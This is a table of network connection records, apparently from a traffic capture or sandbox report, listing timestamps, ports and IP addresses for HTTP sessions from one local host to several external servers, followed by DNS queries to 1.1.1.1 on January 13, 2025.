Jan 13, 2025 10:25:04.390656948 CET	80	49825	45.56.79.23	192.168.11.20
Jan 13, 2025 10:25:04.390826941 CET	49825	80	192.168.11.20	45.56.79.23
Jan 13, 2025 10:25:04.394294024 CET	49825	80	192.168.11.20	45.56.79.23
Jan 13, 2025 10:25:04.528563976 CET	80	49825	45.56.79.23	192.168.11.20
Jan 13, 2025 10:25:04.528573990 CET	80	49825	45.56.79.23	192.168.11.20
Jan 13, 2025 10:25:04.528707027 CET	49825	80	192.168.11.20	45.56.79.23
Jan 13, 2025 10:25:05.899286032 CET	49825	80	192.168.11.20	45.56.79.23
Jan 13, 2025 10:25:06.915369034 CET	49826	80	192.168.11.20	45.56.79.23
Jan 13, 2025 10:25:07.046272039 CET	80	49826	45.56.79.23	192.168.11.20
Jan 13, 2025 10:25:07.046439886 CET	49826	80	192.168.11.20	45.56.79.23
Jan 13, 2025 10:25:07.050031900 CET	49826	80	192.168.11.20	45.56.79.23
Jan 13, 2025 10:25:07.050055981 CET	49826	80	192.168.11.20	45.56.79.23
Jan 13, 2025 10:25:07.050133944 CET	49826	80	192.168.11.20	45.56.79.23
Jan 13, 2025 10:25:07.181078911 CET	80	49826	45.56.79.23	192.168.11.20
Jan 13, 2025 10:25:07.181209087 CET	80	49826	45.56.79.23	192.168.11.20
Jan 13, 2025 10:25:07.181333065 CET	80	49826	45.56.79.23	192.168.11.20
Jan 13, 2025 10:25:07.181576967 CET	80	49826	45.56.79.23	192.168.11.20
Jan 13, 2025 10:25:07.181586027 CET	80	49826	45.56.79.23	192.168.11.20
Jan 13, 2025 10:25:07.181848049 CET	80	49826	45.56.79.23	192.168.11.20
Jan 13, 2025 10:25:07.181858063 CET	80	49826	45.56.79.23	192.168.11.20
Jan 13, 2025 10:25:07.184345007 CET	80	49826	45.56.79.23	192.168.11.20
Jan 13, 2025 10:25:07.184501886 CET	80	49826	45.56.79.23	192.168.11.20
Jan 13, 2025 10:25:07.184698105 CET	49826	80	192.168.11.20	45.56.79.23
Jan 13, 2025 10:25:08.554879904 CET	49826	80	192.168.11.20	45.56.79.23
Jan 13, 2025 10:25:09.571507931 CET	49827	80	192.168.11.20	45.56.79.23
Jan 13, 2025 10:25:09.702342987 CET	80	49827	45.56.79.23	192.168.11.20
Jan 13, 2025 10:25:09.702524900 CET	49827	80	192.168.11.20	45.56.79.23
Jan 13, 2025 10:25:09.704935074 CET	49827	80	192.168.11.20	45.56.79.23
Jan 13, 2025 10:25:09.837949991 CET	80	49827	45.56.79.23	192.168.11.20
Jan 13, 2025 10:25:09.837960958 CET	80	49827	45.56.79.23	192.168.11.20
Jan 13, 2025 10:25:09.837969065 CET	80	49827	45.56.79.23	192.168.11.20
Jan 13, 2025 10:25:09.838207960 CET	49827	80	192.168.11.20	45.56.79.23
Jan 13, 2025 10:25:09.838880062 CET	49827	80	192.168.11.20	45.56.79.23
Jan 13, 2025 10:25:10.178900957 CET	49827	80	192.168.11.20	45.56.79.23
Jan 13, 2025 10:25:10.319621086 CET	80	49827	45.56.79.23	192.168.11.20
Jan 13, 2025 10:25:14.851227999 CET	49828	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:25:14.951050043 CET	80	49828	104.21.16.1	192.168.11.20
Jan 13, 2025 10:25:14.951277018 CET	49828	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:25:14.955183983 CET	49828	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:25:15.055052996 CET	80	49828	104.21.16.1	192.168.11.20
Jan 13, 2025 10:25:15.532166958 CET	80	49828	104.21.16.1	192.168.11.20
Jan 13, 2025 10:25:15.532176018 CET	80	49828	104.21.16.1	192.168.11.20
Jan 13, 2025 10:25:15.532314062 CET	49828	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:25:15.532612085 CET	80	49828	104.21.16.1	192.168.11.20
Jan 13, 2025 10:25:15.532712936 CET	49828	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:25:16.459450960 CET	49828	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:25:17.475563049 CET	49829	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:25:17.575300932 CET	80	49829	104.21.16.1	192.168.11.20
Jan 13, 2025 10:25:17.575467110 CET	49829	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:25:17.578967094 CET	49829	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:25:17.678809881 CET	80	49829	104.21.16.1	192.168.11.20
Jan 13, 2025 10:25:18.147521019 CET	80	49829	104.21.16.1	192.168.11.20
Jan 13, 2025 10:25:18.147531033 CET	80	49829	104.21.16.1	192.168.11.20
Jan 13, 2025 10:25:18.147768021 CET	49829	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:25:18.147996902 CET	80	49829	104.21.16.1	192.168.11.20
Jan 13, 2025 10:25:18.148185015 CET	49829	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:25:19.083842039 CET	49829	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:25:20.099955082 CET	49830	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:25:20.199671030 CET	80	49830	104.21.16.1	192.168.11.20
Jan 13, 2025 10:25:20.199862003 CET	49830	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:25:20.203804970 CET	49830	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:25:20.203855038 CET	49830	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:25:20.303754091 CET	80	49830	104.21.16.1	192.168.11.20
Jan 13, 2025 10:25:20.303857088 CET	80	49830	104.21.16.1	192.168.11.20
Jan 13, 2025 10:25:20.303957939 CET	80	49830	104.21.16.1	192.168.11.20
Jan 13, 2025 10:25:20.304166079 CET	80	49830	104.21.16.1	192.168.11.20
Jan 13, 2025 10:25:20.304174900 CET	80	49830	104.21.16.1	192.168.11.20
Jan 13, 2025 10:25:20.304450989 CET	80	49830	104.21.16.1	192.168.11.20
Jan 13, 2025 10:25:20.304543972 CET	80	49830	104.21.16.1	192.168.11.20
Jan 13, 2025 10:25:20.776592016 CET	80	49830	104.21.16.1	192.168.11.20
Jan 13, 2025 10:25:20.776602030 CET	80	49830	104.21.16.1	192.168.11.20
Jan 13, 2025 10:25:20.776827097 CET	49830	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:25:20.777240992 CET	80	49830	104.21.16.1	192.168.11.20
Jan 13, 2025 10:25:20.777374983 CET	49830	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:25:21.708282948 CET	49830	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:25:22.724781036 CET	49831	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:25:22.824546099 CET	80	49831	104.21.16.1	192.168.11.20
Jan 13, 2025 10:25:22.824718952 CET	49831	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:25:22.827586889 CET	49831	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:25:22.927293062 CET	80	49831	104.21.16.1	192.168.11.20
Jan 13, 2025 10:25:23.381313086 CET	80	49831	104.21.16.1	192.168.11.20
Jan 13, 2025 10:25:23.381323099 CET	80	49831	104.21.16.1	192.168.11.20
Jan 13, 2025 10:25:23.381613970 CET	49831	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:25:23.381659031 CET	80	49831	104.21.16.1	192.168.11.20
Jan 13, 2025 10:25:23.381834984 CET	49831	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:25:23.382467031 CET	49831	80	192.168.11.20	104.21.16.1
Jan 13, 2025 10:25:23.482196093 CET	80	49831	104.21.16.1	192.168.11.20
Jan 13, 2025 10:25:28.395133972 CET	49832	80	192.168.11.20	199.192.21.169
Jan 13, 2025 10:25:28.561533928 CET	80	49832	199.192.21.169	192.168.11.20
Jan 13, 2025 10:25:28.561749935 CET	49832	80	192.168.11.20	199.192.21.169
Jan 13, 2025 10:25:28.565246105 CET	49832	80	192.168.11.20	199.192.21.169
Jan 13, 2025 10:25:28.731990099 CET	80	49832	199.192.21.169	192.168.11.20
Jan 13, 2025 10:25:28.747575998 CET	80	49832	199.192.21.169	192.168.11.20
Jan 13, 2025 10:25:28.747591019 CET	80	49832	199.192.21.169	192.168.11.20
Jan 13, 2025 10:25:28.747757912 CET	49832	80	192.168.11.20	199.192.21.169
Jan 13, 2025 10:25:30.081454992 CET	49832	80	192.168.11.20	199.192.21.169
Jan 13, 2025 10:25:31.097645998 CET	49833	80	192.168.11.20	199.192.21.169
Jan 13, 2025 10:25:31.262129068 CET	80	49833	199.192.21.169	192.168.11.20
Jan 13, 2025 10:25:31.262320042 CET	49833	80	192.168.11.20	199.192.21.169
Jan 13, 2025 10:25:31.265891075 CET	49833	80	192.168.11.20	199.192.21.169
Jan 13, 2025 10:25:31.430233002 CET	80	49833	199.192.21.169	192.168.11.20
Jan 13, 2025 10:25:31.442111015 CET	80	49833	199.192.21.169	192.168.11.20
Jan 13, 2025 10:25:31.442126989 CET	80	49833	199.192.21.169	192.168.11.20
Jan 13, 2025 10:25:31.442282915 CET	49833	80	192.168.11.20	199.192.21.169
Jan 13, 2025 10:25:32.768439054 CET	49833	80	192.168.11.20	199.192.21.169
Jan 13, 2025 10:25:33.784554958 CET	49834	80	192.168.11.20	199.192.21.169
Jan 13, 2025 10:25:33.953639030 CET	80	49834	199.192.21.169	192.168.11.20
Jan 13, 2025 10:25:33.953800917 CET	49834	80	192.168.11.20	199.192.21.169
Jan 13, 2025 10:25:33.957779884 CET	49834	80	192.168.11.20	199.192.21.169
Jan 13, 2025 10:25:33.957839966 CET	49834	80	192.168.11.20	199.192.21.169
Jan 13, 2025 10:25:33.957859993 CET	49834	80	192.168.11.20	199.192.21.169
Jan 13, 2025 10:25:33.958049059 CET	49834	80	192.168.11.20	199.192.21.169
Jan 13, 2025 10:25:34.127041101 CET	80	49834	199.192.21.169	192.168.11.20
Jan 13, 2025 10:25:34.127057076 CET	80	49834	199.192.21.169	192.168.11.20
Jan 13, 2025 10:25:34.127065897 CET	80	49834	199.192.21.169	192.168.11.20
Jan 13, 2025 10:25:34.127334118 CET	80	49834	199.192.21.169	192.168.11.20
Jan 13, 2025 10:25:34.127430916 CET	80	49834	199.192.21.169	192.168.11.20
Jan 13, 2025 10:25:34.127679110 CET	80	49834	199.192.21.169	192.168.11.20
Jan 13, 2025 10:25:34.127691984 CET	80	49834	199.192.21.169	192.168.11.20
Jan 13, 2025 10:25:34.145819902 CET	80	49834	199.192.21.169	192.168.11.20
Jan 13, 2025 10:25:34.145833969 CET	80	49834	199.192.21.169	192.168.11.20
Jan 13, 2025 10:25:34.145976067 CET	49834	80	192.168.11.20	199.192.21.169
Jan 13, 2025 10:25:35.470933914 CET	49834	80	192.168.11.20	199.192.21.169
Jan 13, 2025 10:25:36.487062931 CET	49835	80	192.168.11.20	199.192.21.169
Jan 13, 2025 10:25:36.650693893 CET	80	49835	199.192.21.169	192.168.11.20
Jan 13, 2025 10:25:36.650862932 CET	49835	80	192.168.11.20	199.192.21.169
Jan 13, 2025 10:25:36.653534889 CET	49835	80	192.168.11.20	199.192.21.169
Jan 13, 2025 10:25:36.816821098 CET	80	49835	199.192.21.169	192.168.11.20
Jan 13, 2025 10:25:36.827260017 CET	80	49835	199.192.21.169	192.168.11.20
Jan 13, 2025 10:25:36.827275038 CET	80	49835	199.192.21.169	192.168.11.20
Jan 13, 2025 10:25:36.827595949 CET	49835	80	192.168.11.20	199.192.21.169
Jan 13, 2025 10:25:36.828264952 CET	49835	80	192.168.11.20	199.192.21.169
Jan 13, 2025 10:25:36.991209984 CET	80	49835	199.192.21.169	192.168.11.20
Jan 13, 2025 10:25:49.999819994 CET	49836	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:25:50.327132940 CET	80	49836	47.83.1.90	192.168.11.20
Jan 13, 2025 10:25:50.327363968 CET	49836	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:25:50.330992937 CET	49836	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:25:50.658150911 CET	80	49836	47.83.1.90	192.168.11.20
Jan 13, 2025 10:25:51.371068954 CET	80	49836	47.83.1.90	192.168.11.20
Jan 13, 2025 10:25:51.371085882 CET	80	49836	47.83.1.90	192.168.11.20
Jan 13, 2025 10:25:51.371207952 CET	49836	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:25:51.842430115 CET	49836	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:25:52.858803034 CET	49837	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:25:53.174555063 CET	80	49837	47.83.1.90	192.168.11.20
Jan 13, 2025 10:25:53.174737930 CET	49837	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:25:53.179712057 CET	49837	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:25:53.495426893 CET	80	49837	47.83.1.90	192.168.11.20
Jan 13, 2025 10:25:54.198919058 CET	80	49837	47.83.1.90	192.168.11.20
Jan 13, 2025 10:25:54.198936939 CET	80	49837	47.83.1.90	192.168.11.20
Jan 13, 2025 10:25:54.199057102 CET	49837	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:25:54.685524940 CET	49837	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:25:55.701735973 CET	49838	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:25:56.013533115 CET	80	49838	47.83.1.90	192.168.11.20
Jan 13, 2025 10:25:56.013819933 CET	49838	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:25:56.022808075 CET	49838	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:25:56.334688902 CET	80	49838	47.83.1.90	192.168.11.20
Jan 13, 2025 10:25:56.334768057 CET	80	49838	47.83.1.90	192.168.11.20
Jan 13, 2025 10:25:56.334824085 CET	80	49838	47.83.1.90	192.168.11.20
Jan 13, 2025 10:25:56.335093975 CET	80	49838	47.83.1.90	192.168.11.20
Jan 13, 2025 10:25:56.335129023 CET	80	49838	47.83.1.90	192.168.11.20
Jan 13, 2025 10:25:56.335346937 CET	80	49838	47.83.1.90	192.168.11.20
Jan 13, 2025 10:25:56.335375071 CET	80	49838	47.83.1.90	192.168.11.20
Jan 13, 2025 10:25:57.044773102 CET	80	49838	47.83.1.90	192.168.11.20
Jan 13, 2025 10:25:57.044815063 CET	80	49838	47.83.1.90	192.168.11.20
Jan 13, 2025 10:25:57.044950962 CET	49838	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:25:57.528714895 CET	49838	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:25:58.544876099 CET	49839	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:25:58.872603893 CET	80	49839	47.83.1.90	192.168.11.20
Jan 13, 2025 10:25:58.872910976 CET	49839	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:25:58.876462936 CET	49839	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:25:59.208165884 CET	80	49839	47.83.1.90	192.168.11.20
Jan 13, 2025 10:25:59.939762115 CET	80	49839	47.83.1.90	192.168.11.20
Jan 13, 2025 10:25:59.939805031 CET	80	49839	47.83.1.90	192.168.11.20
Jan 13, 2025 10:25:59.940053940 CET	49839	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:25:59.940702915 CET	49839	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:26:00.268021107 CET	80	49839	47.83.1.90	192.168.11.20
Jan 13, 2025 10:26:04.949810028 CET	49840	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:26:05.963810921 CET	49840	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:26:06.064950943 CET	80	49840	13.248.169.48	192.168.11.20
Jan 13, 2025 10:26:06.065176964 CET	49840	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:26:06.068713903 CET	49840	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:26:06.169997931 CET	80	49840	13.248.169.48	192.168.11.20
Jan 13, 2025 10:26:06.170041084 CET	80	49840	13.248.169.48	192.168.11.20
Jan 13, 2025 10:26:06.170166969 CET	49840	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:26:07.573427916 CET	49840	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:26:08.589536905 CET	49841	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:26:08.691988945 CET	80	49841	13.248.169.48	192.168.11.20
Jan 13, 2025 10:26:08.692187071 CET	49841	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:26:08.695626020 CET	49841	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:26:08.801856995 CET	80	49841	13.248.169.48	192.168.11.20
Jan 13, 2025 10:26:08.801944017 CET	80	49841	13.248.169.48	192.168.11.20
Jan 13, 2025 10:26:08.802084923 CET	49841	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:26:10.197801113 CET	49841	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:26:11.213933945 CET	49842	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:26:11.318591118 CET	80	49842	13.248.169.48	192.168.11.20
Jan 13, 2025 10:26:11.318752050 CET	49842	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:26:11.322344065 CET	49842	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:26:11.322402954 CET	49842	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:26:11.424663067 CET	80	49842	13.248.169.48	192.168.11.20
Jan 13, 2025 10:26:11.424685955 CET	80	49842	13.248.169.48	192.168.11.20
Jan 13, 2025 10:26:11.424974918 CET	80	49842	13.248.169.48	192.168.11.20
Jan 13, 2025 10:26:11.425250053 CET	80	49842	13.248.169.48	192.168.11.20
Jan 13, 2025 10:26:11.425275087 CET	80	49842	13.248.169.48	192.168.11.20
Jan 13, 2025 10:26:11.425403118 CET	49842	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:26:12.837848902 CET	49842	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:26:13.853991985 CET	49843	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:26:13.957998991 CET	80	49843	13.248.169.48	192.168.11.20
Jan 13, 2025 10:26:13.958189011 CET	49843	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:26:13.960573912 CET	49843	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:26:14.065469027 CET	80	49843	13.248.169.48	192.168.11.20
Jan 13, 2025 10:26:14.065479994 CET	80	49843	13.248.169.48	192.168.11.20
Jan 13, 2025 10:26:14.065762997 CET	49843	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:26:14.066406965 CET	49843	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:26:14.168273926 CET	80	49843	13.248.169.48	192.168.11.20
Jan 13, 2025 10:26:19.071769953 CET	49844	80	192.168.11.20	160.25.166.123
Jan 13, 2025 10:26:19.436032057 CET	80	49844	160.25.166.123	192.168.11.20
Jan 13, 2025 10:26:19.436244965 CET	49844	80	192.168.11.20	160.25.166.123
Jan 13, 2025 10:26:19.439790010 CET	49844	80	192.168.11.20	160.25.166.123
Jan 13, 2025 10:26:19.801084042 CET	80	49844	160.25.166.123	192.168.11.20
Jan 13, 2025 10:26:19.803921938 CET	80	49844	160.25.166.123	192.168.11.20
Jan 13, 2025 10:26:19.803932905 CET	80	49844	160.25.166.123	192.168.11.20
Jan 13, 2025 10:26:19.803940058 CET	80	49844	160.25.166.123	192.168.11.20
Jan 13, 2025 10:26:19.804116011 CET	49844	80	192.168.11.20	160.25.166.123
Jan 13, 2025 10:26:20.945494890 CET	49844	80	192.168.11.20	160.25.166.123
Jan 13, 2025 10:26:21.961791039 CET	49845	80	192.168.11.20	160.25.166.123
Jan 13, 2025 10:26:22.322115898 CET	80	49845	160.25.166.123	192.168.11.20
Jan 13, 2025 10:26:22.322376966 CET	49845	80	192.168.11.20	160.25.166.123
Jan 13, 2025 10:26:22.325917959 CET	49845	80	192.168.11.20	160.25.166.123
Jan 13, 2025 10:26:22.685765028 CET	80	49845	160.25.166.123	192.168.11.20
Jan 13, 2025 10:26:22.686233997 CET	80	49845	160.25.166.123	192.168.11.20
Jan 13, 2025 10:26:22.686261892 CET	80	49845	160.25.166.123	192.168.11.20
Jan 13, 2025 10:26:22.686285973 CET	80	49845	160.25.166.123	192.168.11.20
Jan 13, 2025 10:26:22.686465979 CET	49845	80	192.168.11.20	160.25.166.123
Jan 13, 2025 10:26:23.835506916 CET	49845	80	192.168.11.20	160.25.166.123
Jan 13, 2025 10:26:24.851655960 CET	49846	80	192.168.11.20	160.25.166.123
Jan 13, 2025 10:26:25.207207918 CET	80	49846	160.25.166.123	192.168.11.20
Jan 13, 2025 10:26:25.207370996 CET	49846	80	192.168.11.20	160.25.166.123
Jan 13, 2025 10:26:25.210947990 CET	49846	80	192.168.11.20	160.25.166.123
Jan 13, 2025 10:26:25.210978985 CET	49846	80	192.168.11.20	160.25.166.123
Jan 13, 2025 10:26:25.211050987 CET	49846	80	192.168.11.20	160.25.166.123
Jan 13, 2025 10:26:25.565907955 CET	80	49846	160.25.166.123	192.168.11.20
Jan 13, 2025 10:26:25.565998077 CET	80	49846	160.25.166.123	192.168.11.20
Jan 13, 2025 10:26:25.566063881 CET	80	49846	160.25.166.123	192.168.11.20
Jan 13, 2025 10:26:25.566783905 CET	80	49846	160.25.166.123	192.168.11.20
Jan 13, 2025 10:26:25.566801071 CET	80	49846	160.25.166.123	192.168.11.20
Jan 13, 2025 10:26:25.566942930 CET	80	49846	160.25.166.123	192.168.11.20
Jan 13, 2025 10:26:25.566957951 CET	80	49846	160.25.166.123	192.168.11.20
Jan 13, 2025 10:26:25.566967964 CET	80	49846	160.25.166.123	192.168.11.20
Jan 13, 2025 10:26:25.566976070 CET	49846	80	192.168.11.20	160.25.166.123
Jan 13, 2025 10:26:25.566977978 CET	80	49846	160.25.166.123	192.168.11.20
Jan 13, 2025 10:26:25.566987038 CET	80	49846	160.25.166.123	192.168.11.20
Jan 13, 2025 10:26:25.567140102 CET	80	49846	160.25.166.123	192.168.11.20
Jan 13, 2025 10:26:25.921684027 CET	80	49846	160.25.166.123	192.168.11.20
Jan 13, 2025 10:26:27.741684914 CET	49847	80	192.168.11.20	160.25.166.123
Jan 13, 2025 10:26:28.097939014 CET	80	49847	160.25.166.123	192.168.11.20
Jan 13, 2025 10:26:28.098180056 CET	49847	80	192.168.11.20	160.25.166.123
Jan 13, 2025 10:26:28.100589037 CET	49847	80	192.168.11.20	160.25.166.123
Jan 13, 2025 10:26:28.456324100 CET	80	49847	160.25.166.123	192.168.11.20
Jan 13, 2025 10:26:28.456989050 CET	80	49847	160.25.166.123	192.168.11.20
Jan 13, 2025 10:26:28.457005978 CET	80	49847	160.25.166.123	192.168.11.20
Jan 13, 2025 10:26:28.457019091 CET	80	49847	160.25.166.123	192.168.11.20
Jan 13, 2025 10:26:28.457324982 CET	49847	80	192.168.11.20	160.25.166.123
Jan 13, 2025 10:26:28.458003998 CET	49847	80	192.168.11.20	160.25.166.123
Jan 13, 2025 10:26:28.813682079 CET	80	49847	160.25.166.123	192.168.11.20
Jan 13, 2025 10:26:33.475331068 CET	49848	80	192.168.11.20	172.67.132.227
Jan 13, 2025 10:26:33.575566053 CET	80	49848	172.67.132.227	192.168.11.20
Jan 13, 2025 10:26:33.575784922 CET	49848	80	192.168.11.20	172.67.132.227
Jan 13, 2025 10:26:33.579308987 CET	49848	80	192.168.11.20	172.67.132.227
Jan 13, 2025 10:26:33.679357052 CET	80	49848	172.67.132.227	192.168.11.20
Jan 13, 2025 10:26:33.689342976 CET	80	49848	172.67.132.227	192.168.11.20
Jan 13, 2025 10:26:33.689498901 CET	80	49848	172.67.132.227	192.168.11.20
Jan 13, 2025 10:26:33.689699888 CET	49848	80	192.168.11.20	172.67.132.227
Jan 13, 2025 10:26:35.083079100 CET	49848	80	192.168.11.20	172.67.132.227
Jan 13, 2025 10:26:36.099248886 CET	49849	80	192.168.11.20	172.67.132.227
Jan 13, 2025 10:26:36.199264050 CET	80	49849	172.67.132.227	192.168.11.20
Jan 13, 2025 10:26:36.199465990 CET	49849	80	192.168.11.20	172.67.132.227
Jan 13, 2025 10:26:36.203007936 CET	49849	80	192.168.11.20	172.67.132.227
Jan 13, 2025 10:26:36.302984953 CET	80	49849	172.67.132.227	192.168.11.20
Jan 13, 2025 10:26:36.316319942 CET	80	49849	172.67.132.227	192.168.11.20
Jan 13, 2025 10:26:36.317034006 CET	80	49849	172.67.132.227	192.168.11.20
Jan 13, 2025 10:26:36.317142010 CET	49849	80	192.168.11.20	172.67.132.227
Jan 13, 2025 10:26:37.707503080 CET	49849	80	192.168.11.20	172.67.132.227
Jan 13, 2025 10:26:38.723644972 CET	49850	80	192.168.11.20	172.67.132.227
Jan 13, 2025 10:26:38.823575020 CET	80	49850	172.67.132.227	192.168.11.20
Jan 13, 2025 10:26:38.823734999 CET	49850	80	192.168.11.20	172.67.132.227
Jan 13, 2025 10:26:38.827325106 CET	49850	80	192.168.11.20	172.67.132.227
Jan 13, 2025 10:26:38.827347040 CET	49850	80	192.168.11.20	172.67.132.227
Jan 13, 2025 10:26:38.827420950 CET	49850	80	192.168.11.20	172.67.132.227
Jan 13, 2025 10:26:38.927133083 CET	80	49850	172.67.132.227	192.168.11.20
Jan 13, 2025 10:26:38.927390099 CET	80	49850	172.67.132.227	192.168.11.20
Jan 13, 2025 10:26:38.927649975 CET	80	49850	172.67.132.227	192.168.11.20
Jan 13, 2025 10:26:38.927669048 CET	80	49850	172.67.132.227	192.168.11.20
Jan 13, 2025 10:26:38.927675962 CET	80	49850	172.67.132.227	192.168.11.20
Jan 13, 2025 10:26:38.927934885 CET	80	49850	172.67.132.227	192.168.11.20
Jan 13, 2025 10:26:38.938349009 CET	80	49850	172.67.132.227	192.168.11.20
Jan 13, 2025 10:26:38.938534021 CET	80	49850	172.67.132.227	192.168.11.20
Jan 13, 2025 10:26:38.938643932 CET	49850	80	192.168.11.20	172.67.132.227
Jan 13, 2025 10:26:40.332087040 CET	49850	80	192.168.11.20	172.67.132.227
Jan 13, 2025 10:26:41.348104954 CET	49851	80	192.168.11.20	172.67.132.227
Jan 13, 2025 10:26:41.448146105 CET	80	49851	172.67.132.227	192.168.11.20
Jan 13, 2025 10:26:41.448323011 CET	49851	80	192.168.11.20	172.67.132.227
Jan 13, 2025 10:26:41.450746059 CET	49851	80	192.168.11.20	172.67.132.227
Jan 13, 2025 10:26:41.550497055 CET	80	49851	172.67.132.227	192.168.11.20
Jan 13, 2025 10:26:41.560573101 CET	80	49851	172.67.132.227	192.168.11.20
Jan 13, 2025 10:26:41.560978889 CET	80	49851	172.67.132.227	192.168.11.20
Jan 13, 2025 10:26:41.561139107 CET	49851	80	192.168.11.20	172.67.132.227
Jan 13, 2025 10:26:41.561764956 CET	49851	80	192.168.11.20	172.67.132.227
Jan 13, 2025 10:26:41.661550999 CET	80	49851	172.67.132.227	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2025 10:21:10.051074028 CET	49593	53	192.168.11.20	1.1.1.1
Jan 13, 2025 10:21:10.356240034 CET	53	49593	1.1.1.1	192.168.11.20
Jan 13, 2025 10:21:25.822415113 CET	63479	53	192.168.11.20	1.1.1.1
Jan 13, 2025 10:21:26.019773960 CET	53	63479	1.1.1.1	192.168.11.20
Jan 13, 2025 10:21:39.273241043 CET	63951	53	192.168.11.20	1.1.1.1
Jan 13, 2025 10:21:39.912256002 CET	53	63951	1.1.1.1	192.168.11.20
Jan 13, 2025 10:21:53.472506046 CET	56111	53	192.168.11.20	1.1.1.1
Jan 13, 2025 10:21:53.579878092 CET	53	56111	1.1.1.1	192.168.11.20
Jan 13, 2025 10:22:07.000752926 CET	55525	53	192.168.11.20	1.1.1.1
Jan 13, 2025 10:22:07.159527063 CET	53	55525	1.1.1.1	192.168.11.20
Jan 13, 2025 10:22:15.217762947 CET	61083	53	192.168.11.20	1.1.1.1
Jan 13, 2025 10:22:15.539438009 CET	53	61083	1.1.1.1	192.168.11.20
Jan 13, 2025 10:22:30.417587996 CET	61255	53	192.168.11.20	1.1.1.1
Jan 13, 2025 10:22:30.526417017 CET	53	61255	1.1.1.1	192.168.11.20
Jan 13, 2025 10:22:44.648926973 CET	49903	53	192.168.11.20	1.1.1.1
Jan 13, 2025 10:22:45.403894901 CET	53	49903	1.1.1.1	192.168.11.20
Jan 13, 2025 10:22:59.786148071 CET	51713	53	192.168.11.20	1.1.1.1
Jan 13, 2025 10:22:59.905673027 CET	53	51713	1.1.1.1	192.168.11.20
Jan 13, 2025 10:23:13.017795086 CET	50029	53	192.168.11.20	1.1.1.1
Jan 13, 2025 10:23:13.120079041 CET	53	50029	1.1.1.1	192.168.11.20
Jan 13, 2025 10:23:21.172928095 CET	51806	53	192.168.11.20	1.1.1.1
Jan 13, 2025 10:23:21.855506897 CET	53	51806	1.1.1.1	192.168.11.20
Jan 13, 2025 10:23:40.433662891 CET	57643	53	192.168.11.20	1.1.1.1
Jan 13, 2025 10:23:41.026813030 CET	53	57643	1.1.1.1	192.168.11.20
Jan 13, 2025 10:23:55.602298021 CET	60657	53	192.168.11.20	1.1.1.1
Jan 13, 2025 10:23:55.872288942 CET	53	60657	1.1.1.1	192.168.11.20
Jan 13, 2025 10:24:11.005206108 CET	58584	53	192.168.11.20	1.1.1.1
Jan 13, 2025 10:24:11.279006004 CET	53	58584	1.1.1.1	192.168.11.20
Jan 13, 2025 10:24:24.767853975 CET	59742	53	192.168.11.20	1.1.1.1
Jan 13, 2025 10:24:24.889484882 CET	53	59742	1.1.1.1	192.168.11.20
Jan 13, 2025 10:24:38.108763933 CET	58902	53	192.168.11.20	1.1.1.1
Jan 13, 2025 10:24:38.212935925 CET	53	58902	1.1.1.1	192.168.11.20
